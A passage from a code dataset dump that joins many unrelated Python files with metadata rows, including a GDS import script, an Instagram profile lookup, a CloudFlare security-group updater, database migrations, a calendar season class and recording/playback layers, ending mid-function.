#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from bag.core import BagProject
from bag.util.misc import register_pdb_hook
register_pdb_hook()
if __name__ == '__main__':
    _args = parse_options()
    local_dict = locals()
    # reuse a BagProject already bound as `bprj` in the interactive
    # namespace when present; otherwise create a fresh one
    if 'bprj' not in local_dict:
        print('creating BAG project')
        _prj = BagProject()
    else:
        print('loading BAG project')
        _prj = local_dict['bprj']
    run_main(_prj, _args)
| 29.653061 | 81 | 0.722643 | # SPDX-License-Identifier: Apache-2.0
# Copyright 2019 Blue Cheetah Analog Design Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from bag.core import BagProject
from bag.util.misc import register_pdb_hook
register_pdb_hook()
def parse_options() -> argparse.Namespace:
    """Parse the command line: positional GDS file name and library name."""
    parser = argparse.ArgumentParser(description='Generate cell from spec file.')
    parser.add_argument('fname', help='GDS file name.')
    parser.add_argument('lib_name', help='layout library name.')
    return parser.parse_args()
def run_main(prj: BagProject, args: argparse.Namespace) -> None:
    """Import the GDS file named on the command line into the given library."""
    prj.import_gds_file(args.fname, args.lib_name)
if __name__ == '__main__':
    _args = parse_options()
    local_dict = locals()
    # reuse a BagProject already bound as `bprj` in the interactive
    # namespace when present; otherwise create a fresh one
    if 'bprj' not in local_dict:
        print('creating BAG project')
        _prj = BagProject()
    else:
        print('loading BAG project')
        _prj = local_dict['bprj']
    run_main(_prj, _args)
| 365 | 0 | 46 |
8f70e1a6887b98e59c86a33ce0edc6d78eddf21a | 523 | py | Python | instagram.py | abhi-s28/InstaFlask | ded93f75795d5bdcc9d9f06dac3bda094516e7cc | [
"MIT"
] | null | null | null | instagram.py | abhi-s28/InstaFlask | ded93f75795d5bdcc9d9f06dac3bda094516e7cc | [
"MIT"
] | null | null | null | instagram.py | abhi-s28/InstaFlask | ded93f75795d5bdcc9d9f06dac3bda094516e7cc | [
"MIT"
] | 1 | 2020-10-01T03:30:42.000Z | 2020-10-01T03:30:42.000Z | #!/usr/bin/env python3
import argparse
import re
import sys
import requests
| 21.791667 | 57 | 0.594646 | #!/usr/bin/env python3
import argparse
import re
import sys
import requests
def getID(username):
url = "https://www.instagram.com/{}"
r = requests.get(url.format(username))
html = r.text
if r.ok:
return re.findall('"id":"(.*?)",', html)[0]
else:
return "invalid_username"
def userDetails(userID):
url = "https://i.instagram.com/api/v1/users/{}/info/"
r = requests.get(url.format(userID))
if r.ok:
data = r.json()
return data
else:
return "NULL"
| 401 | 0 | 46 |
af41a834d1cccc2cce84e521eb37ee8cfb3a792d | 2,123 | py | Python | cloudformation/add_cloudflare_ips_to_sgs.py | juliecentofanti172/juliecentofanti.github.io | 446ea8522b9f4a6709124ebb6e0f675acf7fe205 | [
"CC0-1.0"
] | 134 | 2018-05-23T14:00:29.000Z | 2022-03-10T15:47:53.000Z | cloudformation/add_cloudflare_ips_to_sgs.py | ptrourke/concordia | 56ff364dbf38cb8a763df489479821fe43b76d69 | [
"CC0-1.0"
] | 1,104 | 2018-05-22T20:18:22.000Z | 2022-03-31T17:28:40.000Z | cloudformation/add_cloudflare_ips_to_sgs.py | ptrourke/concordia | 56ff364dbf38cb8a763df489479821fe43b76d69 | [
"CC0-1.0"
] | 32 | 2018-05-22T20:22:38.000Z | 2021-12-21T14:11:44.000Z | #!/usr/bin/env python3
"""
Ensure that every security group tagged with “AllowCloudFlareIngress” has
permissions for every public CloudFlare netblock
"""
import sys
import boto3
import requests
from botocore.exceptions import ClientError
EC2_CLIENT = boto3.client("ec2")
CLOUDFLARE_IPV4 = requests.get("https://www.cloudflare.com/ips-v4").text.splitlines()
CLOUDFLARE_IPV6 = requests.get("https://www.cloudflare.com/ips-v6").text.splitlines()
# add any missing CloudFlare CIDRs to every tagged security group
if __name__ == "__main__":
    for security_group_id, existing_permissions in get_security_groups():
        add_ingess_rules_for_group(security_group_id, existing_permissions)
| 30.328571 | 87 | 0.681583 | #!/usr/bin/env python3
"""
Ensure that every security group tagged with “AllowCloudFlareIngress” has
permissions for every public CloudFlare netblock
"""
import sys
import boto3
import requests
from botocore.exceptions import ClientError
EC2_CLIENT = boto3.client("ec2")
CLOUDFLARE_IPV4 = requests.get("https://www.cloudflare.com/ips-v4").text.splitlines()
CLOUDFLARE_IPV6 = requests.get("https://www.cloudflare.com/ips-v6").text.splitlines()
def add_ingess_rules_for_group(sg_id, existing_permissions):
    """Grant HTTPS ingress from every CloudFlare netblock to one group.

    CIDRs that the group already allows on tcp/443 are skipped so the
    call stays idempotent.  Authorization failures go to stderr.
    """
    permissions = {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443}

    # collect the CIDRs the group already authorizes for tcp/443
    existing_ipv4 = set()
    existing_ipv6 = set()
    for existing in existing_permissions:
        same_rule = all(
            permissions[k] == existing[k]
            for k in ("IpProtocol", "FromPort", "ToPort")
        )
        if not same_rule:
            continue
        existing_ipv4.update(i["CidrIp"] for i in existing["IpRanges"])
        existing_ipv6.update(i["CidrIpv6"] for i in existing["Ipv6Ranges"])

    # only request the CloudFlare ranges that are not present yet
    permissions["IpRanges"] = [
        {"CidrIp": cidr, "Description": "CloudFlare"}
        for cidr in CLOUDFLARE_IPV4
        if cidr not in existing_ipv4
    ]
    permissions["Ipv6Ranges"] = [
        {"CidrIpv6": cidr, "Description": "CloudFlare"}
        for cidr in CLOUDFLARE_IPV6
        if cidr not in existing_ipv6
    ]

    try:
        EC2_CLIENT.authorize_security_group_ingress(
            GroupId=sg_id, IpPermissions=[permissions]
        )
    except ClientError as exc:
        print(f"Unable to add permssions for {sg_id}: {exc}", file=sys.stderr)
def get_security_groups():
    """Yield (group_id, ip_permissions) for every tagged security group.

    Pages through all groups carrying the AllowCloudFlareIngress tag key.
    """
    tag_filter = [{"Name": "tag-key", "Values": ["AllowCloudFlareIngress"]}]
    paginator = EC2_CLIENT.get_paginator("describe_security_groups")
    for page in paginator.paginate(Filters=tag_filter):
        for group in page["SecurityGroups"]:
            yield group["GroupId"], group["IpPermissions"]
# add any missing CloudFlare CIDRs to every tagged security group
if __name__ == "__main__":
    for security_group_id, existing_permissions in get_security_groups():
        add_ingess_rules_for_group(security_group_id, existing_permissions)
| 1,449 | 0 | 46 |
8081ee348f5ac1ea91c76d0d12aed0bb2eb67a0b | 7,391 | py | Python | ads/piccolo_migrations/2020-10-04T21:27:16.py | sinisaos/starlette-piccolo-rental | c837756c7930e058ea341c67285d0c38f005b007 | [
"MIT"
] | 3 | 2020-10-08T09:37:03.000Z | 2022-03-29T04:05:42.000Z | ads/piccolo_migrations/2020-10-04T21:27:16.py | sinisaos/starlette-piccolo-rental | c837756c7930e058ea341c67285d0c38f005b007 | [
"MIT"
] | null | null | null | ads/piccolo_migrations/2020-10-04T21:27:16.py | sinisaos/starlette-piccolo-rental | c837756c7930e058ea341c67285d0c38f005b007 | [
"MIT"
] | null | null | null | from piccolo.apps.migrations.auto import MigrationManager
from piccolo.columns.base import OnDelete, OnUpdate
from piccolo.columns.defaults.timestamp import TimestampNow
from piccolo.table import Table
ID = "2020-10-04T21:27:16"
VERSION = "0.13.4"
| 25.139456 | 63 | 0.492085 | from piccolo.apps.migrations.auto import MigrationManager
from piccolo.columns.base import OnDelete, OnUpdate
from piccolo.columns.defaults.timestamp import TimestampNow
from piccolo.table import Table
class Ad(Table, tablename="ad"):
    # stub referencing the existing "ad" table; used only as a
    # ForeignKey target in forwards() below
    pass
class User(Table, tablename="piccolo_user"):
    # stub referencing the existing "piccolo_user" table; used only as a
    # ForeignKey target in forwards() below
    pass
ID = "2020-10-04T21:27:16"
VERSION = "0.13.4"
async def forwards():
    """Auto-generated Piccolo migration: create the Rent, Image, Review
    and Notification tables together with their columns and foreign keys.
    Do not edit by hand beyond comments."""
    manager = MigrationManager(migration_id=ID, app_name="ads")
    manager.add_table("Rent", tablename="rent")
    manager.add_table("Image", tablename="image")
    manager.add_table("Review", tablename="review")
    manager.add_table("Notification", tablename="notification")
    # --- Rent: booking period plus links to the client and the ad ---
    manager.add_column(
        table_class_name="Rent",
        tablename="rent",
        column_name="start_date",
        column_class_name="Timestamp",
        params={
            "default": TimestampNow(),
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Rent",
        tablename="rent",
        column_name="end_date",
        column_class_name="Timestamp",
        params={
            "default": TimestampNow(),
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Rent",
        tablename="rent",
        column_name="client",
        column_class_name="ForeignKey",
        params={
            "references": User,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Rent",
        tablename="rent",
        column_name="ad_rent",
        column_class_name="ForeignKey",
        params={
            "references": Ad,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    # --- Image: stored file path plus a link to its ad ---
    manager.add_column(
        table_class_name="Image",
        tablename="image",
        column_name="path",
        column_class_name="Varchar",
        params={
            "length": 255,
            "default": "",
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Image",
        tablename="image",
        column_name="ad_image",
        column_class_name="ForeignKey",
        params={
            "references": Ad,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    # --- Review: text, timestamp, grade, author and reviewed ad ---
    manager.add_column(
        table_class_name="Review",
        tablename="review",
        column_name="content",
        column_class_name="Text",
        params={
            "default": "",
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Review",
        tablename="review",
        column_name="created",
        column_class_name="Timestamp",
        params={
            "default": TimestampNow(),
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Review",
        tablename="review",
        column_name="review_grade",
        column_class_name="Integer",
        params={
            "default": 0,
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Review",
        tablename="review",
        column_name="review_user",
        column_class_name="ForeignKey",
        params={
            "references": User,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Review",
        tablename="review",
        column_name="ad",
        column_class_name="ForeignKey",
        params={
            "references": Ad,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    # --- Notification: message metadata plus sender/recipient links ---
    manager.add_column(
        table_class_name="Notification",
        tablename="notification",
        column_name="message",
        column_class_name="Varchar",
        params={
            "length": 150,
            "default": "",
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Notification",
        tablename="notification",
        column_name="created",
        column_class_name="Timestamp",
        params={
            "default": TimestampNow(),
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Notification",
        tablename="notification",
        column_name="is_read",
        column_class_name="Boolean",
        params={
            "default": False,
            "null": False,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Notification",
        tablename="notification",
        column_name="sender",
        column_class_name="ForeignKey",
        params={
            "references": User,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    manager.add_column(
        table_class_name="Notification",
        tablename="notification",
        column_name="recipient",
        column_class_name="ForeignKey",
        params={
            "references": User,
            "on_delete": OnDelete.cascade,
            "on_update": OnUpdate.cascade,
            "default": None,
            "null": True,
            "primary": False,
            "key": False,
            "unique": False,
            "index": False,
        },
    )
    return manager
| 7,017 | 52 | 69 |
470d82fe0f9ff4d06e37cfd357a2fd5d5db8cc6b | 2,024 | py | Python | lunar_python/SolarSeason.py | AD189/lunar-python | 2463c7b493e67895476c11cf1a12ff146f2d54e4 | [
"MIT"
] | 2 | 2021-03-12T10:36:16.000Z | 2021-04-03T09:45:54.000Z | lunar_python/SolarSeason.py | AD189/lunar-python | 2463c7b493e67895476c11cf1a12ff146f2d54e4 | [
"MIT"
] | null | null | null | lunar_python/SolarSeason.py | AD189/lunar-python | 2463c7b493e67895476c11cf1a12ff146f2d54e4 | [
"MIT"
] | 1 | 2021-03-08T13:31:53.000Z | 2021-03-08T13:31:53.000Z | # -*- coding: utf-8 -*-
from math import ceil
from .SolarMonth import SolarMonth
class SolarSeason:
"""
阳历季度
"""
MONTH_COUNT = 3
@staticmethod
@staticmethod
def getIndex(self):
"""
获取当月是第几季度
:return: 季度序号,从1开始
"""
return int(ceil(self.__month * 1.0 / SolarSeason.MONTH_COUNT))
def getMonths(self):
"""
获取本季度的阳历月列表
:return: 阳历月列表
"""
l = []
index = self.getIndex() - 1
for i in range(0, SolarSeason.MONTH_COUNT):
l.append(SolarMonth.fromYm(self.__year, SolarSeason.MONTH_COUNT * index + i + 1))
return l
def next(self, seasons):
"""
季度推移
:param seasons: 推移的季度数,负数为倒推
:return: 推移后的季度
"""
if 0 == seasons:
return SolarSeason.fromYm(self.__year, self.__month)
year = self.__year
month = self.__month
months = SolarSeason.MONTH_COUNT * seasons
if months == 0:
return SolarSeason.fromYm(year, month)
n = abs(months)
for i in range(1, n + 1):
if months < 0:
month -= 1
if month < 1:
month = 12
year -= 1
else:
month += 1
if month > 12:
month = 1
year += 1
return SolarSeason.fromYm(year, month)
| 23.811765 | 93 | 0.51581 | # -*- coding: utf-8 -*-
from math import ceil
from .SolarMonth import SolarMonth
class SolarSeason:
    """A quarter (three-month season) of the Gregorian calendar."""

    # number of months per quarter
    MONTH_COUNT = 3

    def __init__(self, year, month):
        self.__year = year
        self.__month = month

    @staticmethod
    def fromDate(date):
        """Build a SolarSeason from an object with year/month attributes."""
        return SolarSeason(date.year, date.month)

    @staticmethod
    def fromYm(year, month):
        """Build a SolarSeason from a year and month number."""
        return SolarSeason(year, month)

    def getYear(self):
        """Return the year."""
        return self.__year

    def getMonth(self):
        """Return the month."""
        return self.__month

    def toString(self):
        """Return a short representation such as ``2021.2``."""
        return str(self.__year) + "." + str(self.getIndex())

    def toFullString(self):
        """Return the full (Chinese) representation such as ``2021年2季度``."""
        return str(self.__year) + "年" + str(self.getIndex()) + "季度"

    def __str__(self):
        return self.toString()

    def getIndex(self):
        """Return which quarter this month falls in, counting from 1."""
        return int(ceil(self.__month * 1.0 / SolarSeason.MONTH_COUNT))

    def getMonths(self):
        """Return the list of SolarMonth objects that make up this quarter."""
        months = []
        index = self.getIndex() - 1
        for i in range(0, SolarSeason.MONTH_COUNT):
            months.append(SolarMonth.fromYm(self.__year, SolarSeason.MONTH_COUNT * index + i + 1))
        return months

    def next(self, seasons):
        """Shift by *seasons* quarters (negative shifts backwards).

        Returns the resulting SolarSeason.
        """
        if 0 == seasons:
            return SolarSeason.fromYm(self.__year, self.__month)
        year = self.__year
        month = self.__month
        months = SolarSeason.MONTH_COUNT * seasons
        # NOTE: the original re-checked ``months == 0`` here, but that
        # branch was unreachable after the early return above (seasons
        # is nonzero, so months is nonzero); it has been removed
        n = abs(months)
        for i in range(1, n + 1):
            if months < 0:
                month -= 1
                if month < 1:
                    month = 12
                    year -= 1
            else:
                month += 1
                if month > 12:
                    month = 1
                    year += 1
        return SolarSeason.fromYm(year, month)
| 371 | 0 | 214 |
1ef5269a29ed14f340b7b35a1d453fbf4107d653 | 418 | py | Python | dedupper/migrations/0004_auto_20181024_1902.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 1 | 2019-04-21T18:57:57.000Z | 2019-04-21T18:57:57.000Z | dedupper/migrations/0004_auto_20181024_1902.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | null | null | null | dedupper/migrations/0004_auto_20181024_1902.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | null | null | null | # Generated by Django 2.0.5 on 2018-10-24 19:02
from django.db import migrations, models
| 23.222222 | 72 | 0.617225 | # Generated by Django 2.0.5 on 2018-10-24 19:02
from django.db import migrations, models
class Migration(migrations.Migration):
    # auto-generated: relaxes Progress.completed_reps to allow blank /
    # null values with a default of 0
    dependencies = [
        ('dedupper', '0003_auto_20181024_1653'),
    ]
    operations = [
        migrations.AlterField(
            model_name='progress',
            name='completed_reps',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
    ]
| 0 | 304 | 23 |
6ba3dd8d2110f5406aabb2ce13d75dbd24ed27c4 | 943 | py | Python | server.py | quixadhal/PyConq | af81685651d66a117b3a3c2f47e90d9be6d6119c | [
"MIT"
] | 1 | 2017-04-14T11:53:47.000Z | 2017-04-14T11:53:47.000Z | server.py | quixadhal/PyConq | af81685651d66a117b3a3c2f47e90d9be6d6119c | [
"MIT"
] | null | null | null | server.py | quixadhal/PyConq | af81685651d66a117b3a3c2f47e90d9be6d6119c | [
"MIT"
] | 1 | 2019-11-06T00:15:48.000Z | 2019-11-06T00:15:48.000Z | # -*- coding: utf-8 -*- line endings: unix -*-
__author__ = 'quixadhal'
import os
import sys
import time
import sysutils
import log_system
import db_system
logger = log_system.init_logging()
sys.path.append(os.getcwd())
if __name__ == '__main__':
    # boot sequence: log resource usage before and after database init
    logger.boot('System booting.')
    snapshot = sysutils.ResourceSnapshot()
    logger.info(snapshot.log_data())
    db_system.init_db()
    snapshot = sysutils.ResourceSnapshot()
    logger.info(snapshot.log_data())
    # imported here, after init_db() - presumably Session needs the
    # initialized database; confirm before moving to top of file
    from db_system import Session
    from option import Option
    session = Session()
    options = session.query(Option).first()
    logger.boot('Using database version %s, created on %s', options.version, options.date_created)
    #logger.boot('Port number is %d', options.port)
    #logger.boot('Wizlock is %s', options.wizlock)
    time.sleep(1)
    snapshot = sysutils.ResourceSnapshot()
    logger.info(snapshot.log_data())
    logger.critical('System halted.')
| 26.194444 | 98 | 0.706257 | # -*- coding: utf-8 -*- line endings: unix -*-
__author__ = 'quixadhal'
import os
import sys
import time
import sysutils
import log_system
import db_system
logger = log_system.init_logging()
sys.path.append(os.getcwd())
if __name__ == '__main__':
    # boot sequence: log resource usage before and after database init
    logger.boot('System booting.')
    snapshot = sysutils.ResourceSnapshot()
    logger.info(snapshot.log_data())
    db_system.init_db()
    snapshot = sysutils.ResourceSnapshot()
    logger.info(snapshot.log_data())
    # imported here, after init_db() - presumably Session needs the
    # initialized database; confirm before moving to top of file
    from db_system import Session
    from option import Option
    session = Session()
    options = session.query(Option).first()
    logger.boot('Using database version %s, created on %s', options.version, options.date_created)
    #logger.boot('Port number is %d', options.port)
    #logger.boot('Wizlock is %s', options.wizlock)
    time.sleep(1)
    snapshot = sysutils.ResourceSnapshot()
    logger.info(snapshot.log_data())
    logger.critical('System halted.')
| 0 | 0 | 0 |
1594aebaf6d0841b2caf45d8aa4b867e7d74fc2d | 616 | py | Python | scripts/prediction_scripts/final_edit_django_dbs.py | amanparmar17/cultivo-1 | 06030116ba47f99fee8f413404777c9dbdb4e92a | [
"MIT"
] | null | null | null | scripts/prediction_scripts/final_edit_django_dbs.py | amanparmar17/cultivo-1 | 06030116ba47f99fee8f413404777c9dbdb4e92a | [
"MIT"
] | null | null | null | scripts/prediction_scripts/final_edit_django_dbs.py | amanparmar17/cultivo-1 | 06030116ba47f99fee8f413404777c9dbdb4e92a | [
"MIT"
] | 1 | 2018-10-08T17:08:48.000Z | 2018-10-08T17:08:48.000Z | import pandas as pa
import numpy as np
import matplotlib.pyplot as plt
from sklearn.preprocessing import Imputer,LabelEncoder,OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
#%%
datset=pa.read_csv("datasets/One.csv")
#datset_district=datset.drop_duplicates('District_Name')['District_Name']
datset_crop=datset.drop_duplicates('crop')['crop']
#%%
for i in datset_crop:
value=(datset.loc[(datset['crop'] == i)])
for j in headers:
mean_1=(value[j]).mean()
| 29.333333 | 73 | 0.751623 | import pandas as pa
import numpy as np
import matplotlib.pyplot as plt
from sklearn.preprocessing import Imputer,LabelEncoder,OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
#%%
datset=pa.read_csv("datasets/One.csv")
#datset_district=datset.drop_duplicates('District_Name')['District_Name']
datset_crop=datset.drop_duplicates('crop')['crop']
#%%
for i in datset_crop:
value=(datset.loc[(datset['crop'] == i)])
for j in headers:
mean_1=(value[j]).mean()
| 0 | 0 | 0 |
983f1d8504e2d7ad92153087a3f6fde57e6d1a35 | 345 | py | Python | python/load_data.py | dnbh/kpg | c9e79b8092434919e9ac90dc199f49845403c2ba | [
"MIT"
] | 69 | 2018-01-08T19:56:55.000Z | 2022-03-05T17:14:05.000Z | python/load_data.py | dnbaker/emp | c9e79b8092434919e9ac90dc199f49845403c2ba | [
"MIT"
] | 6 | 2018-04-14T21:09:51.000Z | 2021-07-17T21:08:54.000Z | python/load_data.py | dnbaker/emp | c9e79b8092434919e9ac90dc199f49845403c2ba | [
"MIT"
] | 11 | 2018-03-21T19:28:35.000Z | 2021-06-29T17:33:34.000Z | #!/usr/bin/env python
import numpy as np
if __name__ == "__main__":
import sys
data = load_data(sys.argv[1])
print("data: %s, %s" % (data, str(data.shape)))
| 23 | 59 | 0.542029 | #!/usr/bin/env python
import numpy as np
def load_data(path):
    """Load a tab-separated data file into a 2-D float array.

    Lines starting with ``#`` are treated as comments and skipped.  On
    every remaining line the first two tab-separated fields are dropped
    (assumed to be identifier columns -- TODO confirm against the input
    format) and the rest are parsed as doubles.

    Parameters
    ----------
    path : str
        Path to the tab-separated input file.

    Returns
    -------
    numpy.ndarray
        Array of dtype ``np.double`` with one row per non-comment line.
    """
    # Use a context manager so the file handle is closed deterministically;
    # the original relied on garbage collection to close it.
    with open(path) as handle:
        rows = [line.strip().split('\t')[2:]
                for line in handle if line[0] != "#"]
    return np.array(rows, dtype=np.double)
if __name__ == "__main__":
    # CLI usage: python <script>.py <path-to-tsv>
    # Prints the parsed array followed by its shape.
    import sys
    data = load_data(sys.argv[1])
    print("data: %s, %s" % (data, str(data.shape)))
| 150 | 0 | 23 |
db472a55122303d1be9380f2fcee3bbadb791f64 | 56 | py | Python | examples/_tests_scripts/_alchemy.py | rhololkeolke/catalyst-rl | ec18ff4a58b6d00652f772231db8de86debb4b3d | [
"Apache-2.0"
] | 46 | 2020-03-27T20:12:32.000Z | 2021-11-21T19:08:51.000Z | examples/_tests_scripts/_alchemy.py | rhololkeolke/catalyst-rl | ec18ff4a58b6d00652f772231db8de86debb4b3d | [
"Apache-2.0"
] | 2 | 2020-04-06T10:43:04.000Z | 2020-07-01T18:26:10.000Z | examples/_tests_scripts/_alchemy.py | rhololkeolke/catalyst-rl | ec18ff4a58b6d00652f772231db8de86debb4b3d | [
"Apache-2.0"
] | 5 | 2020-04-17T14:09:53.000Z | 2021-05-10T08:58:29.000Z | # flake8: noqa
from catalyst_rl.dl import AlchemyRunner
| 18.666667 | 40 | 0.821429 | # flake8: noqa
from catalyst_rl.dl import AlchemyRunner
| 0 | 0 | 0 |
74525a6c7c9b583ed6d5b4b3b60fdfe64f60b9f1 | 766 | py | Python | piecash/__init__.py | aslehigh/piecash | 797aca5abd08b686e5d47f077b00a095fb4804ed | [
"MIT"
] | null | null | null | piecash/__init__.py | aslehigh/piecash | 797aca5abd08b686e5d47f077b00a095fb4804ed | [
"MIT"
] | null | null | null | piecash/__init__.py | aslehigh/piecash | 797aca5abd08b686e5d47f077b00a095fb4804ed | [
"MIT"
] | 1 | 2020-01-18T15:55:04.000Z | 2020-01-18T15:55:04.000Z | # -*- coding: utf-8 -*-
"""Python interface to GnuCash documents"""
from . import metadata
__version__ = metadata.version
__author__ = metadata.authors[0]
__license__ = metadata.license
__copyright__ = metadata.copyright
from ._common import (
GncNoActiveSession,
GnucashException, GncValidationError, GncImbalanceError,
Recurrence
)
from .core import (
Book,
Account, ACCOUNT_TYPES, AccountType,
Transaction, Split, ScheduledTransaction, Lot,
Commodity, Price,
create_book, open_book,
factories,
)
from .business import Vendor, Customer, Employee, Address
from .business import Invoice, Job
from .business import Taxtable, TaxtableEntry
from .budget import Budget, BudgetAmount
from .kvp import slot
from .ledger import ledger
| 26.413793 | 60 | 0.761097 | # -*- coding: utf-8 -*-
"""Python interface to GnuCash documents"""
from . import metadata
__version__ = metadata.version
__author__ = metadata.authors[0]
__license__ = metadata.license
__copyright__ = metadata.copyright
from ._common import (
GncNoActiveSession,
GnucashException, GncValidationError, GncImbalanceError,
Recurrence
)
from .core import (
Book,
Account, ACCOUNT_TYPES, AccountType,
Transaction, Split, ScheduledTransaction, Lot,
Commodity, Price,
create_book, open_book,
factories,
)
from .business import Vendor, Customer, Employee, Address
from .business import Invoice, Job
from .business import Taxtable, TaxtableEntry
from .budget import Budget, BudgetAmount
from .kvp import slot
from .ledger import ledger
| 0 | 0 | 0 |
8d7bbc000d01c91d54319de8215580d95edad4f0 | 3,304 | py | Python | pyrealtime/record_layer.py | ewhitmire/pyrealtime | 5cfd37ff7b05cf33d2aab9b9f45188ddf7c76db4 | [
"MIT"
] | 62 | 2017-07-27T18:09:14.000Z | 2021-07-19T00:09:40.000Z | pyrealtime/record_layer.py | ewhitmire/pyrealtime | 5cfd37ff7b05cf33d2aab9b9f45188ddf7c76db4 | [
"MIT"
] | 24 | 2017-06-24T03:26:45.000Z | 2020-11-11T15:24:29.000Z | pyrealtime/record_layer.py | ewhitmire/pyrealtime | 5cfd37ff7b05cf33d2aab9b9f45188ddf7c76db4 | [
"MIT"
] | 15 | 2017-07-02T23:22:25.000Z | 2020-10-28T15:23:58.000Z | from datetime import datetime
import numpy as np
import time
from pyrealtime.layer import ThreadLayer, TransformMixin, ProducerMixin, EncoderMixin
| 32.07767 | 125 | 0.590496 | from datetime import datetime
import numpy as np
import time
from pyrealtime.layer import ThreadLayer, TransformMixin, ProducerMixin, EncoderMixin
class RecordLayer(TransformMixin, EncoderMixin, ThreadLayer):
    """Layer that serialises incoming data as CSV text and appends it to a file.

    Lists and numpy arrays are written as comma-separated values; any other
    payload is recorded via ``str()``.  The output file is opened in
    ``initialize`` and closed in ``shutdown``.
    """
    def __init__(self, port_in, filename=None, file_prefix="recording", append_time=False, split_axis=None, *args, **kwargs):
        super().__init__(port_in, *args, **kwargs)
        if filename is None:
            # Default name: "<file_prefix>_<timestamp>.txt".
            filename = RecordLayer.make_new_filename(file_prefix)
        self.filename = filename
        self.file = None  # opened lazily in initialize()
        self.append_time = append_time
        self.split_axis = split_axis
    def encode(self, data):
        """Serialise *data* to newline-terminated UTF-8 CSV bytes."""
        if isinstance(data, list):
            line = ",".join([str(x) for x in data])
        elif isinstance(data, np.ndarray):
            if self.split_axis is not None:
                # Emit one CSV row per slice taken along split_axis.  The
                # None entries in `shape` act as np.newaxis when indexing;
                # np.squeeze then drops the inserted singleton axes.
                line = ""
                # for i in range(c.shape[self.split_axis]):
                shape = [None] * len(data.shape)
                for i in range(data.shape[self.split_axis]):
                    shape[self.split_axis] = i
                    line += ",".join([str(x) for x in np.squeeze(data[tuple(shape)]).tolist()]) + "\n"
            else:
                line = ",".join([str(x) for x in data.tolist()])
        else:
            line = str(data)
        if self.append_time:
            # NOTE(review): when split_axis produces multiple rows, the
            # timestamp prefixes only the first row -- confirm intended.
            line = "%f,%s" % (time.time(), line)
        if line[-1] != "\n":
            line += "\n"
        return line.encode('utf-8')
    def initialize(self):
        """Open the output file; called once before processing starts."""
        super().initialize()
        self.file = open(self.filename, 'wb')
        self.file.flush()
    def transform(self, data):
        # _encode is provided by EncoderMixin and presumably dispatches to
        # encode() above -- TODO confirm in pyrealtime.layer.
        self.file.write(self._encode(data))
        self.file.flush()
    def shutdown(self):
        """Close the output file when the layer stops."""
        self.file.close()
    @staticmethod
    def make_new_filename(prefix):
        """Return '<prefix>_<yy_mm_dd_HH_MM_SS>.txt' from the current time."""
        timestamp = datetime.now().strftime("%y_%m_%d_%H_%M_%S")
        return "%s_%s.txt" % (prefix, timestamp)
class PlaybackLayer(ProducerMixin, ThreadLayer):
    """Layer that replays a previously recorded file line by line.

    Lines are emitted at a fixed rate (lines per second); when the end of
    the file is reached the layer stops itself.
    """
    def __init__(self, filename=None, rate=1, strip_time=False, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.filename = filename
        self.file = None  # opened lazily in initialize()
        # Seconds to sleep between emitted lines (rate = lines per second).
        self.interval = 1 / rate
        self.strip_time = strip_time
    def decode(self, line):
        """Decode a raw line; optionally drop the leading timestamp field."""
        data = line.decode('utf-8').strip()
        if self.strip_time:
            # Drop everything up to and including the first comma -- the
